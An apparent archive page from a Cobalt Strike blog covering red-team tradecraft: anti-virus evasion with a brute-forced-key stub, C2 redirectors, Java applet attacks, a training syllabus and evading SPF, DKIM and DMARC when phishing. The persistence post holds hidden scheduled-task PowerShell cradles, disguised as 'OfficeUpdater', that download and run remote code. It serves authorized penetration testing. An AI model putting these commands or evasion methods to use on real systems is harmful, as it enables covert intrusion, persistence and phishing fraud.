Red Team Archives - Cobalt Strike Research and Development

What took so long? (A little product philosophy)

Cobalt Strike’s January 8, 2014 release generates executables that evade many anti-virus products. This is probably one of the most requested features for Cobalt Strike.

Given the demand–why did it take so long for me to do something about it?

One-off anti-virus evasion is trivial. In 2012, I wrote a one-off stager for Windows Meterpreter. Few products caught it then. Few catch it now. Why? Because very few people use it. There’s no reason for an anti-virus vendor to write signatures against it.

When I use Cobalt Strike–I always bring a collection of private scripts to generate artifacts when I need them. I’ve never had a problem with anti-virus. Many of my users have their own process to generate artifacts. Good stuff is available publicly too. For example, Veil is a fantastic artifact generator.

If anti-virus evasion is so trivial–why didn’t I build new artifacts into Cobalt Strike until now?

Long-term Utility

Every feature I build has to have long-term utility. I want tools that will help get into networks and evade defenses five to ten years from now.

If I built short-term features, my work would hit a local optimum that I may not escape. Over time, each improvement would serve only to balance the faded utility of the old things next to it. Without maintenance, a product with short-term features would decay until it’s not useful.

Long-term focus has the opposite benefit. If I do my job right, each release is more useful to my users than any previous release. New features interact well with existing ones and all features become more useful. This sounds like common sense… but it’s not a natural course for software.

Imagine a toolset built around locating known service vulnerabilities and launching remote exploits. Seven years ago–this hypothetical toolset could rule the world. Today? This toolset’s utility would diminish with each day as it’s built for yesterday’s attack surface. Even with patchwork improvements, the best days for this kit are in the past. A few client-side attacks next to a rusty Windows 2003 rootkit create an image of a dilapidated amusement park with one ride that still works. The world does change and sometimes these changes will obsolete what was otherwise good. At this point, it’s time to reinvent. I feel this is where we are with penetration testing tools.

Expected Life

Every time I build something–I ask, how does this give my users and me an advantage today, tomorrow, and next year? Or better put–what is the expected life of this capability?

On the offense side–a lot of our technology has a comically short expected life. Exploits are a good example of this. Once the vulnerability an exploit targets is patched–the clock starts ticking. Every day that exploit loses utility as fewer opportunities will exist to use it. I don’t build exploits and it’s not a focus of my product. A single exploit is not a long-term advantage. A team or community of exploit developers? They’re a long-term advantage. I leverage the great work in the Metasploit Framework for this. But, in terms of value add, I have to find other places to provide a long-term advantage.

What types of technologies provide a long-term advantage? Reconnaissance technologies are a long-term advantage. Nmap will probably have use in the hacker’s toolbag for, at least, our lifetime. A reconnaissance tool is a life extender for your existing kit of attack options. A three-year-old Internet Explorer exploit isn’t interesting—except when a reconnaissance technology helps you realize that your target is vulnerable to it. This is why I put so much effort into Cobalt Strike’s System Profiler. The System Profiler helps my users squeeze more use out of the client-side exploits in the Metasploit Framework.

Can you think of other technologies that provide a long-term advantage? Remote Administration Payloads. Meterpreter is almost ten years old. Even though it’s gained features—the Windows implementation is the same core that Skape put together a long time ago. Any effort to make post-exploitation better will pay dividends to users many years from now. So long as there’s a way to fire a payload and get it on a system–it has utility. Well, almost. There’s one pain point to this.

The Big Hunt

On the offensive side–we are in the middle of a shift. My ass was kicked by it three years ago. If you haven’t had your ass kicked by this yet–it’s coming, I promise. What’s this offensive ass kicking shift? It’s pro-active network security monitoring as a professional focus and the people who are getting good at it. Our tools are not ready for this. Our tools assume we have the freedom to get out of a network and communicate as much as we like through one channel. These assumptions hold in some cases, but they break in high security environments. What’s the next move? I’ll give you mine.

I’ve built a multi-protocol payload with ways to control its chattiness, flexibility to use redirectors, peer-to-peer communication to limit my egress points, and in a pinch–the ability to tunnel other tools through it. Why did I do this? If I can’t get out of a network with my existing tools–I’m out of the game. If I can’t maintain a stable lifeline into my target’s network–I’m out of the game. If all of my compromised systems phone home to one system–I’m easy to spot and take out of the game.

We had a free pass to use a compromised network without contest. This is coming to an end. Sophisticated attackers evolved their communication methods years ago. We need tools that provide real stealth if we’re going to continue to claim to represent a credible threat.

I work on stealth communication with Beacon, because I see a long-term benefit to this work. I see Browser Pivoting as a technique with a long-term benefit as well. Two-factor authentication hit an adoption tipping point last year and it will disrupt our favored ways to get at data and demonstrate risk. Browser Pivoting is a way to work in this new world. When I look at the offensive landscape, I see no lack of problems to solve.

Anti-virus Evasion – Revisited

What’s a problem that I didn’t touch, because of the short life expectancy of any one solution? I didn’t want to build a public artifact collection to get past anti-virus.

I remember when the US pen tester community became aware of Hyperion. Its researchers wrote a paper on a novel way to defeat any anti-virus sandbox. The technique? Encrypt a payload with a weak key and embed it into an executable with a stub of code to brute force the key. Anti-virus products would give up emulating the binary before the key was brute forced–allowing the executable to pass.

This technique is a long-term advantage. Any one of us can write our own anti-virus bypass generator that uses the Hyperion technique. So long as we keep our generator and its stub to ourselves, it will last a long time. We didn’t do this though. We took the Hyperion proof-of-concept and used it as-is without changes. What happened? Eventually anti-virus vendors wrote signatures for a stub of code in the public binary and then the technique left our minds, even though it’s still valid.
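To make the idea concrete, here's a toy sketch of the technique in Python. The XOR cipher, two-byte key, and MZ marker are stand-ins of my choosing, not Hyperion's actual implementation; the point is only that a deliberately weak, discarded key forces the stub to grind through candidates far longer than an emulator is willing to wait.

```python
import os

def encrypt(payload: bytes, key: bytes) -> bytes:
    # XOR "encryption" stands in for the real cipher; XOR is its own inverse.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))

def stub_recover(blob: bytes, marker: bytes, key_len: int = 2) -> bytes:
    # Brute force every candidate key until a known plaintext marker appears.
    # A real stub would then execute the recovered payload; we just return it.
    for candidate in range(256 ** key_len):
        key = candidate.to_bytes(key_len, "big")
        plain = encrypt(blob, key)
        if plain.startswith(marker):
            return plain
    raise ValueError("key not found")

# Encrypt with a random weak key and throw the key away -- the stub has to
# grind through up to 65,536 candidates to get it back.
payload = b"MZ\x90\x00pretend this is a payload"
blob = encrypt(payload, os.urandom(2))
assert stub_recover(blob, b"MZ") == payload
```

An emulator with a fixed instruction budget never reaches the decrypted payload, so there is nothing for a signature to match except the stub itself--which is exactly why keeping your own stub private matters.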

Let’s go back to the original question. Why didn’t I add anti-virus evasion artifacts until now? I didn’t work on this problem because I didn’t have a sustainable plan. I do now.

I wrote an Artifact Kit. The Artifact Kit is a simple source code framework to generate executables that smuggle payloads past anti-virus. Better, the Artifact Kit is able to build DLLs, executables, and Windows dropper executables. I expect that, in the future, the Artifact Kit will build my persistence executables as well.

I updated Cobalt Strike to use the Artifact Kit to generate executables. My psexec dialogs use it. My Windows Dropper attack uses it. I even found that the Metasploit Framework’s Firefox add-on module, paired with an Artifact Kit executable, becomes a nice way to get a foothold on a fully patched system. This is an example of a new feature complementing existing tools and extending their life and utility.

Artifact Kit’s techniques have a limited lifetime. The more use it gets–the more likely an analyst will spend the time to write signatures and negate the utility of the Artifact Kit. One technique isn’t sustainable. What’s the plan then?

I published the source code to Artifact Kit along with different techniques to a place my customers have access to. I also provided Cortana hooks to make Cobalt Strike use any changes that I or my customers can dream up. Now, anti-virus evasion in Cobalt Strike doesn’t hinge on one technique. It’s a strategy. As soon as one kit gets burned, swap in a new one, and magically everything in the tool that uses it will work. It took some time to think up a flexible abstraction that makes sense. I’m pretty happy with what I have now.

If you’re a developer of offensive capabilities–ask a few questions before you commit to a problem. What is the shelf-life of your solution? Is there a way to extend the life of your solution–if it runs out? And, finally, does your solution have the potential to extend the life of other capabilities? These are the questions I ask to make sure my output has the most impact possible.

Obituary: Java Self-Signed Applet (Age: 1.7u51)

The Java Signed Applet Attack is a staple social engineering option. This attack presents the user with a signed Java Applet. If the user allows this applet to run, the attacker gets access to their system. Val Smith’s 2009 Meta-Phish paper made this attack popular in the penetration testing community.

Last week’s Java 1.7 update 51 takes steps to address this vector. By default, Java will no longer run self-signed applets. This free lunch is over.


A lot of pen testers use an applet signed with a self-signed code signing certificate. For a long time–this was good enough. The old dialog to run a self-signed applet wasn’t scary. And, thanks to the prevalence of self-signed applets in legitimate applications, users were already familiar with it.


Over time, Oracle added aggressive warnings to the self-signed applet dialog. These warnings didn’t stop users from running malicious self-signed applets though.


Starting with Java 1.7u51, we should not rely on self-signed Java applets in our attacks. Going forward, we will need to sign our applet attacks with a valid code signing certificate. This isn’t a bad thing to do. Signing an applet makes the user prompt much nicer. 


Even with a valid code signing certificate–it’s dangerous to assume a Java attack will continue to “always work” in social engineering engagements. Java is heavily abused by attackers. I expect more organizations will disable it in the browser altogether (when they can). We should update our social engineering process to stay relevant.

Here’s my recommendation:

Always profile a sample of your target’s systems before exploitation. I wrote a System Profiler to help with this. A System Profiler is a web application that maps the client-side attack surface for anyone who visits it. Reconnaissance extends the life of all attack vectors by allowing an informed decision about the best attack for a target’s environment.

If Java makes sense for a target’s profile–use it. If Java doesn’t make sense, look at social engineering attack vectors beyond Java. The Microsoft Office Macro Attack is another good option to get a foothold. In environments that do not use application whitelisting yet, a simple Windows Dropper attack will work too.

Cloud-based Redirectors for Distributed Hacking

A common trait among persistent attackers is their distributed infrastructure. A serious attacker doesn’t use one system to launch attacks and catch shells from. Rather, they register many domains and set up several systems to act as redirectors (pivot points) back to their command and control server.


As of last week, Cobalt Strike now has full support for redirectors. A redirector is a system that proxies all traffic to your command and control server. A redirector doesn’t need any special software. A little iptables or socat magic can proxy traffic for you. Redirectors don’t need a lot of power either. You can use a cheap Amazon EC2 instance to serve as a redirector.

Here’s the socat command to forward connections on port 80 to your command and control server:

socat TCP4-LISTEN:80,fork TCP4:

The TCP4-LISTEN argument tells socat to listen for a connection on the port I provide. The fork directive tells socat that it should fork itself to manage each connection that comes in and continue to wait for new connections in the current process. The second argument tells socat which host and port to forward to.
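If you'd like to see what socat is doing under the hood, here's a rough Python equivalent of the same forking proxy. The listen address and `teamserver.example.com` are placeholders; substitute your redirector's port and your real team server.

```python
import socket
import threading

# Placeholders: the redirector's listen address and the real team server.
LISTEN = ("0.0.0.0", 80)
TARGET = ("teamserver.example.com", 80)

def relay(src: socket.socket, dst: socket.socket) -> None:
    # Shovel bytes from src to dst until src closes, then half-close dst.
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def handle(client: socket.socket, target=TARGET) -> None:
    # Proxy one connection: dial the target, then pump both directions.
    upstream = socket.create_connection(target)
    t = threading.Thread(target=relay, args=(upstream, client), daemon=True)
    t.start()
    relay(client, upstream)
    t.join()
    client.close()
    upstream.close()

def serve(listen=LISTEN, target=TARGET) -> None:
    # Accept forever; one thread per connection mirrors socat's fork option.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(listen)
    srv.listen(16)
    while True:
        client, _ = srv.accept()
        threading.Thread(target=handle, args=(client, target), daemon=True).start()

# serve()  # run this on the redirector host
```

The redirector never needs to understand the traffic it carries, which is why a cheap, disposable host is enough for the job.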

Redirectors are great but you need payloads that can take advantage of them. You want the ability to stage through a redirector and have command and control traffic go through your other redirectors. If one redirector gets blocked—the ideal payload would use other redirectors to continue to communicate.

Cobalt Strike’s Beacon can do this. Here’s the new Beacon listener configuration dialog:


You may now specify which host Beacon and other payloads should stage through. Press Save and Beacon will let you specify which redirectors Beacon should call home to as well:


The Metasploit Framework and its payloads are designed to stage from and communicate with the same host. Despite this limitation, these payloads can still benefit from redirectors. Simply spin up a redirector dedicated to a Meterpreter listener. Provide the address of the redirector when you create the listener.


Now, one Cobalt Strike instance has multiple points of presence on the internet. Your Beacons call home to several hosts. Your Meterpreter sessions go through their own redirector. You get the convenience of managing all of this on one team server though.

If you want Meterpreter to communicate through multiple redirectors then tunnel it through Beacon. Use Beacon’s meterpreter command to stage Meterpreter and tunnel it through the current Beacon. This will take advantage of the redirectors you configured the Beacon listener to go through.

Schtasks Persistence with PowerShell One Liners

One of my favorite Metasploit Framework modules is psh_web_delivery. You can find it in exploits -> windows -> misc. This module starts a local web server that hosts a PowerShell script. This module also provides a PowerShell one liner to download this script and run it. I use this module all of the time in my local testing. Here’s the output of the module:


When I provide red team support at an event, persistence is something that usually falls into my lane. Sometimes, people catch my persistence when they find an EXE or DLL artifact with a recent timestamp. Ever since I started to use psh_web_delivery in my testing, I wondered if I could also use it for persistence without dropping an artifact on disk. The answer is yes.

Here’s how to do it with schtasks:

#(X86) - On User Login
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onlogon /ru System

#(X86) - On System Start
schtasks /create /tn OfficeUpdaterB /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onstart /ru System

#(X86) - On User Idle (30mins)
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onidle /i 30

#(X64) - On User Login
schtasks /create /tn OfficeUpdaterA /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onlogon /ru System

#(X64) - On System Start
schtasks /create /tn OfficeUpdaterB /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onstart /ru System

#(X64) - On User Idle (30mins)
schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring('''''))'" /sc onidle /i 30

Each of these one liners assumes a 32-bit PAYLOAD.

I’m not a PowerShell developer, so the hardest part of this exercise for me was the quoting. I’ve never seen anything quite like PowerShell’s convention for escaping quotes. PowerShell includes an option to evaluate a Base64-encoded one liner. I tried to go this route, but I hit the character limit for the task I could schedule.
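If you want to experiment with the Base64 route yourself, here's a sketch of the encoding step. PowerShell's -EncodedCommand switch expects the script Base64-encoded as UTF-16LE, not ASCII, which is easy to get wrong. The download cradle URL below is a placeholder.

```python
import base64

def encode_powershell(command: str) -> str:
    # -EncodedCommand expects the script Base64-encoded as UTF-16LE;
    # sidestepping the quoting headaches is the whole point.
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

# Placeholder download cradle; substitute your own host and script path.
cradle = "IEX ((new-object net.webclient).downloadstring('http://host/update'))"
print("powershell.exe -nop -w hidden -EncodedCommand " + encode_powershell(cradle))
```

Keep the character limit in mind: UTF-16LE doubles the byte count and Base64 adds another third, so the encoded form is roughly 2.7 times the length of the original script.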

One interesting note–you may schedule a task for the user idle event as a non-privileged user. If you need to survive a reboot on a system that you can’t escalate on, this is an option. If you test this option–beware that Windows checks if the user is idle once every fifteen minutes or so. If you schedule an onidle event for 1 minute, don’t expect to see a session one minute later.

Tradecraft – Red Team Operations Course and Notes

A few days ago, I posted the YouTube playlist on Twitter and it’s made a few rounds. That’s great. This blog post properly introduces the course along with a few notes and references for each segment.

Tradecraft is a new nine-part course that provides the background and skills needed to execute a targeted attack as an external actor with Cobalt Strike. I published this course to help you get the most out of the tools I develop.

If you’d like to jump into the course, it’s on YouTube:


Here are a few notes to explore each topic in the course with more depth.

1. Introduction

The first part of tradecraft introduces the course, the Metasploit Framework, and Cobalt Strike. If you already know Armitage or the Metasploit Framework–you don’t need to watch this segment. The goal of this segment is to provide the base background and vocabulary for Metasploit Framework novices to follow this course.

To learn more about the Metasploit Framework:

Cobalt Strike:

Targeted Attacks and Advanced Persistent Threat:

  • Read Intelligence-Driven Computer Network Defense from Lockheed Martin. The process in this course maps well to the “systematic process to target and engage an adversary” presented in this paper. If you need to exercise controls that detect, deny, disrupt, degrade, or deceive an adversary–I know a product that can help 🙂
  • Watch Michael Daly’s 2009 USENIX talk, The Advanced Persistent Threat. This talk pre-dates the marketing bonanza over APT actors and their work. This is a common sense discussion of the topic without an agenda. Even though it’s from 2009, the material is spot on.
  • Watch Kevin Mandia’s 2014 RSA talk, State of the Hack: One Year After the APT1 Report. This is a 20 minute summary of the APT1 report published by Mandiant in February 2013.

Advanced Persistent Threat Campaigns

These actors managed to compromise thousands of hosts and steal data from them for years, without detection. Cobalt Strike’s aim is to augment the Metasploit Framework to replicate these types of threats.

2. Basic Exploitation (aka Hacking circa 2003)

Basic Exploitation introduces the Metasploit Framework and how to use it through Cobalt Strike. I cover how to pick a remote exploit, brute force credentials, and pivot through SSH. I call this lecture “hacking circa 2003” because remote memory corruption exploits have little use in an environment with a handle on patch management. Again, if you have strong Metasploit-fu, you may skip this lecture.

A few notes:

  • I dismiss remote memory corruption exploits as a dated vector; but don’t discount the remote attack surface. HD Moore and Val Smith‘s Tactical Exploitation is one of the best resources on how to extract information from exposed services. First published in 2007, it’s still relevant. Watch the video and read the paper.
  • I used the Metasploitable 2 Virtual Machine for the Linux demonstrations in this segment.

3. Getting a Foothold

This segment introduces how to execute a targeted attack with Cobalt Strike. We cover client-side attacks, reconnaissance, and crafting an attack package.

To go deeper into this material:

4. Social Engineering

The fourth installment of tradecraft covers how to get an attack package to a user. It explores physical media as an attack vector, along with watering hole attacks, one-off phishing sites, and spear phishing.

  • Watch Advanced Phishing Tactics by Martin Bos and Eric Milam. This talk puts together a lot of concepts needed for a successful phish: how to harvest addresses, develop a good pretext, and create a phishing site.
  • Advanced threat actors favor spear phishing as an access vector. I’d point you to one source, but since this concept has such market buzz, there are a lot of whitepapers on this topic. I suggest a Google search and reading something from a source you consider credible.

5. Post Exploitation with Beacon

By this time, you know how to craft and deliver an attack package. Now, it’s time to learn how to set up Beacon and use it for asynchronous and interactive operations.

6. Post Exploitation with Meterpreter

This video digs into interactive post-exploitation with Meterpreter. You will learn how to use Meterpreter, pivot through the target’s browser, escalate privileges, pivot, and use external tools through a pivot.

Privilege Escalation

7. Lateral Movement

This installment covers lateral movement. You’ll learn how to enumerate hosts and systems with built-in Windows commands, steal tokens, interrogate hosts to steal data, and use just Windows commands to compromise a fully-patched system by abusing trust relationships. My technical foundation is very Linux heavy; I wish this lecture had existed when I was refreshing my skillset.

Token Stealing and Active Directory Abuse

Recovering Passwords 

Pass the Hash

8. Offense in Depth

This segment dissects the process to get a foothold into the defenses you’ll encounter. You’ll learn how to avoid or get past defenses that prevent message delivery, prevent code execution, and detect or stop command and control.

Email Delivery

Anti-virus Evasion

  • If you like, you may use Cortana to force Armitage or Cobalt Strike to use an AV-safe executable of your choosing. You have the option to select an EXE with Cobalt Strike’s dialogs. Cortana also allows you to automate the generation of a new executable for your payload parameters.
  • Also, check out Veil, a framework for generating anti-virus safe executables.
  • Here’s a blog post on how to modify a client-side exploit to get past an anti-virus product.

Payload Staging

Offense in Depth

9. Operations

This last chapter covers operations. Learn how to collaborate during a red team engagement, manage multiple team servers from one client, and load scripts to help you out.


The online course does not have dedicated labs per se. I have two sets of labs I run through with this material.

When I’m hired to teach, I bring a Windows enterprise in a box. I have my students conduct several drills to get familiar with the tools. I then drop them into my enterprise environment and assign goals for them to go through.

I also have a DVD with labs that map to the old version of this course. This DVD has two Linux target virtual machines and an attack virtual machine. Nothing beats setting up a Windows environment to play with these concepts, but this DVD isn’t a bad starter. If you see me at a conference, ask for one.

Email Delivery – What Pen Testers Should Know

I get a lot of questions about spear phishing. There’s a common myth that it’s easy to phish. Start a local mail server and have your hacking tool relay through it. No thinking required.

Not quite. Email is not as open as it was ten years ago. Several standards exist to improve the security of email delivery and deter message spoofing. Fortunately–these standards are a band-aid at best. They’re not evenly implemented across all networks and with a little knowledge of how the system works–you can avoid triggering these protections.


SMTP is the Simple Mail Transfer Protocol. It’s one of the oldest internet protocols still in use. This is the protocol mail servers use to relay email to each other. SMTP runs on port 25.

Each domain that receives email has a mail server designated to receive these messages. A domain owner designates this mail server through an MX or mail exchanger record in its DNS zone file.

Anyone may query a domain’s MX record to find the server that receives email. Here’s how to do it with dig:

# dig +short MX

From the query above, we can see which servers accept mail for the domain. Anyone in the world may connect to one of these servers on port 25 and attempt to relay a message to one of its users.

The SMTP protocol is easy to work with (the S stands for Simple, right?). Here’s what an SMTP exchange looks like:

# telnet 25
Connected to
Escape character is '^]'.
220 mint ESMTP Sendmail 8.14.3/8.14.3/Debian-9.1ubuntu1; Thu, 3 Oct 2013 15:37:30 -0400
     ; (No UCE/UBE) logging access from: [](FAIL)-[]
HELO
250 mint Hello [], pleased to meet you
MAIL FROM: <[email protected]>
250 2.1.0 <[email protected]>... Sender ok
RCPT TO: <[email protected]>
250 2.1.5 <[email protected]>... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
From: "The Dude" <[email protected]>
To: "Lou User" <[email protected]>
Subject: Haaaaaay!

This is message content.
.
250 2.0.0 r93JbUN2002491 Message accepted for delivery
QUIT
221 2.0.0 mint closing connection
Connection closed by foreign host.

The HELO and EHLO commands start a conversation with the mail server. The HELO message does nothing beyond this greeting. The EHLO message asks the mail server to list its abilities. This information tells the SMTP client whether or not a feature (such as STARTTLS) is supported.

The MAIL FROM command tells the mail server who sends this message. This is akin to a return address on an envelope. If a mail server encounters an error it will send a non-delivery notice to the sender. This value is not part of the message the user sees.

The RCPT TO command tells the mail server who to deliver the message to. This information does not need to match the email headers themselves. This value is not part of the message the user sees.

DATA tells the mail server that we’re ready to send the message. The mail server will assume that anything after DATA is message content. This message content will contain the headers and encoded content that the user receives. An SMTP client sends a single period to end this part of the conversation.

If all goes right, the mail server will return a message id and state that the message is in the queue. When the user receives our message, here’s what they see:


Message Content

This blog post focuses on SMTP and I consider a full discussion of email messages and their format out of scope for this post. In short though, a message consists of content and headers.

Headers tell the mail reader who the message is from, who it is to, its subject, and other information. Here are a few typical headers:

From: "Raphael Mudge" <[email protected]>
To: "Scumbag Sales People" <[email protected]>
Subject: Do you do reseller discounts?

SMTP is a plaintext protocol. All email is sent as ASCII text. There are ways to encode binary attachments and rich content messages. For our purposes, message content follows the headers. We can skip the message encoding and specify a message as-is:

Dear Sales Team,
I have a client that wants to buy your software. I will issue a purchase order no 
matter what your reply is. Do you offer reseller discounts?


Purchasing Person

Now that you know what a message looks like, I suggest that you open a terminal and try to send yourself a message by hand. Look up your email domain’s SMTP server with the dig command. Use telnet or nc to connect to port 25 of the mail server. Go through the HELO, MAIL FROM, RCPT TO, and DATA steps. Paste in a message. Type period. Press enter twice. Wait one minute. Then go check your email.

If your message ends up in your spam folder–read the rest of this post for reasons why.

Who connects to SMTP servers?

Mail servers cater to two types of users.

Mail servers receive connections from systems that want to relay a message to a user in the mail server’s domain. If I run a mail server for a domain, I must accept that anyone, anywhere on the internet, may connect to me to relay a message to one of its users.

This last statement is important–Any system on the internet may connect to a mail server to relay a message to one of its users. This system does not have to be a mail server.

The RCPT TO command indicates who the message is for. If the mail server is an open relay, it will accept a message for anyone and relay it to the recipient’s server. Open relays are rare now because spammers abuse(d) them so much. Most likely the mail server is not an open relay. You will need to specify a user in the mail server’s domain when you use RCPT TO.

Mail servers must also cater to authorized users who want to send messages. An authorized user may provide any address for RCPT TO and the mail server will queue it for delivery.

How does one become an authorized user? It depends on the server. Some servers will assume you’re authorized based on the address you connect from. Others will require you to authenticate before they will relay email for you.

Message Rejection

With all of that background out of the way–let’s talk about reasons why a mail server may reject your message. There are quite a few.

The MAIL FROM message indicates who the message is from. If I connect to a mail server and I claim to have a message from one of its users–the mail server will likely reject it. If I am relaying a message to a user on the mail server’s domain, I must claim the message is from a user on another domain.

Some mail servers will reject messages from a system with an internet address that does not resolve to a fully qualified domain name.

If your IP address is associated with an internet blacklist–expect mail servers to reject messages from you. For example, when I try to send a message through a tethered internet connection:

# telnet 25
Connected to
Escape character is '^]'.
553 5.7.1 [BL21] Connections will not be accepted from, because the ip
      is in Spamhaus's list; see
Connection closed by foreign host.

Sender Policy Framework

When I connect to a mail server and send the MAIL FROM command–I am claiming the message is from the address I provide. By default, SMTP does not have a way to verify this statement. It takes what I say at face value.

Sender Policy Framework (or SPF) is a standard to verify this statement. To take advantage of SPF, the owner of a domain creates a DNS TXT record that states which hosts may send email for their domain.

When I connect to a mail server and try to relay a message–the mail server has the opportunity to check the SPF record of the domain I claim the message is from in the MAIL FROM command. If an SPF record exists and my IP address is not in the record–the mail server may reject my message. SPF does not verify the message’s From header.

It takes two for SPF to work. The mail server that receives a message must verify the SPF record. The domain owner must create an SPF record as well. Without both of these elements in place, there is no protection.

To look up the SPF record for a domain, use:

# dig +short TXT
"v=spf1 ip4: ip4: ip4: 
 ip4: ip4: a mx ?all"
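To illustrate the check a receiving mail server performs, here's a simplified SPF evaluator in Python. It handles only literal ip4: mechanisms; a real implementation also resolves a, mx, and include terms and applies the qualifier on all. The record and addresses below are made-up examples in documentation address space.

```python
import ipaddress

def ip_allowed_by_spf(record: str, sender_ip: str) -> bool:
    # Check the connecting IP against the record's ip4: mechanisms only.
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split():
        if term.startswith("ip4:"):
            net = term[len("ip4:"):]
            if "/" not in net:
                net += "/32"  # a bare address means exactly that host
            if ip in ipaddress.ip_network(net):
                return True
    return False

# Made-up record of the same shape as the dig output above.
record = "v=spf1 ip4:203.0.113.0/24 ip4:192.0.2.10 a mx ?all"
assert ip_allowed_by_spf(record, "203.0.113.25")
assert not ip_allowed_by_spf(record, "198.51.100.9")
```

A mail server that runs this check against the MAIL FROM domain can reject your message before it ever reaches a user, which is why you check the record before you pick a domain to spoof.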


DKIM

SPF does not verify message content. DKIM, or DomainKeys Identified Mail, is the standard to verify message content. This is a mechanism for a mail server to sign a message and its contents to confirm that it originated from that server. The signature is added to a message as a DKIM-Signature header.

The DKIM-Signature header is added to a message by a mail server. The DKIM header includes the domain the message is signed for. Another mail server may query the domain’s public key (via DNS) and verify that the message originated from that domain.
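As a sketch, a DKIM-Signature header value can be parsed for its d= (domain) and s= (selector) tags to build the DNS name where the public key is published. The header value below is a hypothetical example; real signatures carry more tags (h=, bh=, b=).

```python
def dkim_key_record(dkim_signature):
    """Parse tags from a DKIM-Signature header value and return the
    DNS name where the signing domain publishes its public key."""
    tags = {}
    for part in dkim_signature.split(";"):
        if "=" in part:
            name, _, value = part.strip().partition("=")
            tags[name] = value
    # The verifier queries <selector>._domainkey.<domain> via DNS TXT.
    return f"{tags['s']}._domainkey.{tags['d']}"

# Hypothetical header value, trimmed for illustration.
header = "v=1; a=rsa-sha256; d=example.com; s=mail; h=from:to:subject"
print(dkim_key_record(header))  # mail._domainkey.example.com
```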

By itself, DKIM has no teeth. The lack of a DKIM header does not mean a message is valid or invalid. Large webmail providers, like Google, have made deals with owners of highly phished domains to check for a DKIM signature and flag a message as spam if it’s not present or verifiable. This protection requires tight cooperation between a domain owner and a mail provider.


Tight cooperation between all email receivers and senders is not a tractable solution to stop email spoofing. Domain-based Message Authentication, Reporting and Conformance (or DMARC) is a standard that allows a domain owner to signal that they use DKIM and SPF. DMARC also allows a domain owner to advise other mail servers about what they should do when a message fails a check.

To check if a domain uses DMARC, use dig to look up a TXT record for

$ dig +short TXT
 "v=DMARC1\; p=none\; rua=mailto:[email protected]"

Check if the domain you will send a message from uses DMARC before you phish. Remember, DMARC only works if the mail server that receives the message checks for the record and acts on it.

Much like SPF, DMARC requires a domain owner to opt-in to the protection. If they don’t, there is no protection against spoofing. Likewise, if a mail server does not check for DMARC, SPF, or DKIM there is no protection for the users on that domain either.
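A minimal sketch of reading the advertised policy out of a DMARC record; the records below are hypothetical examples.

```python
def dmarc_policy(record):
    """Extract the p= policy a domain advertises in its DMARC record.
    Returns None if the record is not a DMARC record."""
    if not record.startswith("v=DMARC1"):
        return None
    for tag in record.split(";"):
        name, _, value = tag.strip().partition("=")
        if name == "p":
            return value  # none, quarantine, or reject
    return None

print(dmarc_policy("v=DMARC1; p=none; rua=mailto:postmaster@example.com"))
print(dmarc_policy("v=DMARC1; p=reject"))
```

A p=none policy means the domain owner is only collecting reports; p=quarantine or p=reject advises receiving servers to act on failures.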

Accepted Domains

Without DMARC, SPF, and DKIM it’s difficult to discard a message as a spoof. There’s one exception to this. Your client should have a good handle on which domains they own. They should also have protections in place to prevent an outsider (you) from emailing their users with a message that spoofs their domain.

One mechanism to stop outsiders spoofing a local user is the Accepted Domains feature in Microsoft Exchange. If you can spoof your customer’s domain as an external actor through their mail server–I would consider this a finding.

Spam Traps

Let’s say your message gets through the initial checks. It’s still at risk of finding its way to the spam folder. Different mail servers and tools check a lot of factors to decide if a message is spam or dangerous. Here are a few to think about:

  • How old is the domain you’re phishing from? If you send a phish from a domain registered last week–it’s possible a mail server may flag it as spam. Older domains are more trustworthy.
  • Does your message contain a link to an IP address? Sometimes a link to an IP address looks suspicious.
  • Does your message display one URL as the link text, but point to a different URL? For example–does your message contain a link that looks like this:
    <a href=""></a>

    This is suspicious.

  • Pay attention to your attachment. Most mail servers block known executable files (e.g., .exe, .pif, .scr, etc.) out of the box. Suspicious attachments won’t help your spam score.
  • Make sure your message content is not broken. Missing HTML close tags, missing headers, and other errors are potential signs of spam. I prefer to repurpose an existing email message for my phishes. An email client does a better job generating valid messages than a hacking tool ever will.
  • Check that your MAIL FROM address matches the email in the From header in your message. Some webmail providers will flag your message as spam if these values do not match. You may not have the same problem with corporate email infrastructure.
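The last check above is easy to sketch: compare the envelope sender to the address parsed out of the From header. The addresses here are hypothetical.

```python
from email.utils import parseaddr

def envelope_matches_header(mail_from, from_header):
    """Compare the envelope (MAIL FROM) sender to the address in the
    message's From header. Some providers flag a mismatch as spam."""
    header_addr = parseaddr(from_header)[1]  # strip the display name
    return mail_from.lower() == header_addr.lower()

print(envelope_matches_header("alice@example.com",
                              "Alice <alice@example.com>"))  # True
print(envelope_matches_header("bob@other.example",
                              "Alice <alice@example.com>"))  # False
```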

Circumventing Defenses

